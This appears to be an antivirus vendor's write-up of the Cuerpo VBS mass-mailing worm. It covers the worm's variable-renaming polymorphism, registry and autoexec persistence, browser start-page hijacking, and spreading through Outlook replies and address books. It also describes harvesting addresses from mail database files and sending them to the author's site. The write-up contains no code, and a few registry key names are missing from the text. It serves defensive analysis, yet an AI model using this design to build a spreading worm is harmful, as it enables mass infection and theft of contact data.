Cuerpo is a polymorphic Visual Basic Script mass-mailer. Its
polymorphism consists of replacing all variables every time it
replicates on a system. For each variable it sets from 2 to 10
random characters. These polymorphic variables are located in a
commented line on the top of the worm code. Cuerpo also saves
itself and most of its components in files with random names.
Once executed, the worm first generates a new polymorphic copy of
itself that it saves to the Windows System directory with a
random name. Next it drops another file to the System directory,
again with a random name, that contains a payload script. This
script is added to the registry:
so it will be executed every time when the system is restarted.
The script checks if four days has passed since the infection,
and if so, it sets the Internet Explorer start page to
www.freedonation.com. Otherwise Cuerpo drops to the System
directory a file "blank.html" which contains a Java Script code.
This code opens a new browser window to www.freedonation.com and
executes the worm. This html file is set to be the Internet
Explorer start page.
The worm spreads trough the Internet using two different ways. The
first method of spreading uses Outlook Application and its
folders. This is the first mass-mailing routine. It goes through
Inbox, Sent Mail, Outbox and Deleted Items folders from the
user's Outlook installation looking for messages that contains an
attachment. When find such messages, it replies to those messages
with the same subject, sending itself as an attachment that
contains the name of the attachment of the original message
adding to it the following string:
" (9 Kbytes).vbs"
Then the worm creates "wininit.bat" that drops the worm into the
system and modifies "autoexec.bat" so that the worm is set to
start in each system restart via the registry.
Then Cuerpo sends itself to all recipients in all address books
using one subject/attachment name combination from the scanned
folders. These messages, however, contain the worm code also
embedded as HTML into the message as well.
Cuerpo uses another method to spread. Additional to sending
itself to e-mail addresses listed in Outlook Application's
address book, it also collects all email-like strings, searching
for special character, in files which are database files for
various e-mail clients. These databases files are with
"txt", "na2", "wab", "mbx" and "dbx"
In addition it searches for all "dat" files that are located in
directory, which contains string found from registry key
Cuerpo stores all these email addresses into an HTML file in the
system directory. This HTML file contains a form that is sent to
virus writer's web site. It is referred from the "blank.html"
thus causing that the information is sent as soon as infected
user opens the Internet Explorer. Then from that remote location
the worm spreads as an embedded HTML in empty message, to all
received e-mail addresses previously collected from the above
database files. The virus writer's web page has been disabled in
a few hours after the worm was discovered. Therefore the second
mass-mailing part of the worm does not work anymore.